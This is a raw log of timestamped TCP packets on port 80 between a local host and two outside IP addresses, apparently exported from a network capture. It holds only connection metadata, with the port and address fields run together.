                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.643456936 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.644458055 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.644501925 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.644563913 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.644608021 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.645524025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.645628929 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.645701885 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.645740032 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.646639109 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.646692038 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.647227049 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.647316933 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.647731066 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.647743940 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.647782087 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.648700953 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.648812056 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.650075912 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.650084019 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.650096893 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.650141954 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.650171995 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.650871038 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.650918007 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.651007891 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.651227951 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.651972055 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.652580976 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.652991056 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.652997971 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.653034925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.653043985 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.653074026 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.654068947 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.654438019 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.654511929 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.654589891 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.655136108 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.655260086 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.791821003 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.791893005 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.791914940 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.791992903 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.792285919 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.792335033 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.792437077 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.792578936 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.793450117 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.793515921 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.793782949 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.794241905 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.794460058 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.794518948 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.795222044 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.795295954 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.795561075 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.795573950 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.795628071 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.796566963 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.796632051 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.797132015 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.797219992 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.797663927 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.797712088 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.798198938 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.798249006 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.798722982 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.798772097 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.799034119 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.799592018 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.799943924 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.799979925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.800015926 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.800035954 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.800869942 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.800930023 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.800988913 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.801472902 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.802045107 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.802102089 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.802467108 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.802824020 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.803069115 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.803193092 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.803237915 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.804075956 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.804121017 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.804160118 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.804197073 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.805252075 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.805268049 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.805309057 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.805325031 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.806258917 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.806333065 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.806375027 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.806487083 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.807297945 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.807362080 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.807992935 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.808032036 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.808434010 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.808449030 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.808481932 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.808500051 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.809533119 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.809593916 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.809673071 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.809782028 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.810545921 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.810601950 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.811077118 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.811117887 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.811577082 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.811635017 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.811902046 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.812654972 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.812711954 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.812946081 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.813759089 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.813811064 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.813890934 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.814882040 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.814958096 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.815074921 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.815661907 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.815866947 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.815973997 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.816057920 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.816307068 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.816935062 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.816977978 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.817523956 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.817589045 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.817981958 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.818027020 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.818137884 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.818197012 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.819067001 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.819116116 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.819154978 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.819200039 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.820183992 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.820225954 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.820255995 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.820278883 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.821194887 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.821269035 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.821866035 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.821919918 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.822319031 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.822372913 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.822407007 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.822449923 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.823333025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.823389053 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.823710918 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.823761940 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.824438095 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.824537039 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.824646950 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.824695110 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.825608015 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.825618982 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.825655937 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.825673103 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.826756954 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.826801062 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.827012062 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.827056885 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.827614069 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.827706099 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.827817917 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.827860117 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.828844070 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.828915119 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.829837084 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.829873085 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.829935074 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.829946041 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.829988003 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.831098080 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.831156969 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.831348896 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.831521988 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.832015991 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.832073927 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.832227945 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.832339048 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.832983971 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.833035946 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.833185911 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.833297968 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.834100962 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.834111929 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.834153891 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.835103989 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.835258961 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.835745096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.835800886 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.836205006 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.836261034 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.836321115 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.836360931 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.837241888 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.837289095 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.837352037 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.837388039 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.838313103 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.838376999 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.838684082 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.838735104 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.839483023 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.839505911 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.839546919 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.839567900 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.840445042 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.840487957 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.841391087 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.841455936 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.841592073 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.841603994 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.841648102 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.842586040 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.842633963 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.843698025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.843709946 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.843733072 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.843736887 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.843765020 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.843782902 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.844753027 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.844803095 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.844938993 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.844985008 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.845905066 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.846028090 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.846915960 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.846929073 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.846939087 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.846961975 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.846991062 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.848048925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.848120928 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.966101885 CET8049938185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.966567993 CET8049938185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.966635942 CET4993880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.967524052 CET4993880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.967860937 CET4994380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.984086037 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.984127045 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.984150887 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.984174013 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.984541893 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.984602928 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.984673977 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.984724045 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.985402107 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.985482931 CET804993131.41.244.11192.168.2.10
